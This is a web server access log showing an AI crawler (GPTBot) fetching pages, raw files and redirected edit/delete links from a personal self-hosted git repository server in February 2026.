"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10737] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11977] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9817] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:17:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9817] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" +[17/Feb/2026:17:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:17:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build" +[17/Feb/2026:17:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 179] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11246] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9812] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10984] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16821] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:17:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 11051] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13221] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 10515] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9801] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:17:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10777] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:21:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:21:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:21:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17664] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assetpilot.ico" +[17/Feb/2026:17:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr 